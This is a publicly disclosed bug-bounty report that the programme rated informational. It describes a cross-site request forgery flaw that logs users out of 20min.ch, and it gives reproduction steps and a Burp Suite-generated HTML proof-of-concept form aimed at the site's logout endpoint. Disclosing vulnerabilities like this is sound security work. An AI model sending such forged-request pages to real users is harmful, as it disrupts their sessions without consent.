CSRF Leads to Logout any Loggedin user from their session

Disclosed by
DeadSniper
  • Program 20 Minuten
  • Disclosed date over 2 years ago
  • Priority P5 Bugcrowd's VRT priority rating
  • Status Informational This vulnerability is seen as an accepted business risk
Summary by DeadSniper

As this is informational finding for you so we can disclose it publicly

Report details

  • Submitted

  • Target Location

    https://www.20min.ch

  • Target category

    Web App

  • VRT

    Cross-Site Request Forgery (CSRF) > Action-Specific > Logout

  • Priority

    P5
  • Bug URL
    https://www.20min.ch/profile
  • Description

    Hi Team👋,

    I found CSRF while logging out from the account. While exploiting this poc by sending it to a user, any logged-in user can be logout from their session.

    SUMMARY📝:

    Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. ... If the victim is an administrative account, CSRF can compromise the entire web application.

    STEPS TO REPRODUCE🔥:

    ⚡ Login to user 1 Account
    ⚡ Then Logout and intercept the request in BurpSuite
    ⚡ Right Click >> Engagement Tools >> Generate CSRF POC
    ⚡ Copy the entire HTML code and save it
    ⚡ Now Run this CSRF Exploit where 2nd Account is logged in
    ⚡ User Logout ⚜(CSRF EXPLOIT!)⚜

    IMPACT💥:

    Logout any victim into the attacker account, send the HTML made by the attacker, and then logout him from the Session.

    POC✨:

    POC Video Attached Below and also, the CODE THAT I USED IS GIVEN BELOW...

  • Extra info

    <html>

    <!-- CSRF PoC - generated by Burp Suite Professional -->

    <body>

    <script>history.pushState('', '', '/')</script>

    <form action="https://api.20min.ch/user/v1/logout">

  <input type="hidden" name="redirect" value="https&#58;&#47;&#47;www&#46;20min&#46;ch&#47;" />

  <input type="submit" value="Submit request" />

</form>

    </body>

    </html>

Activity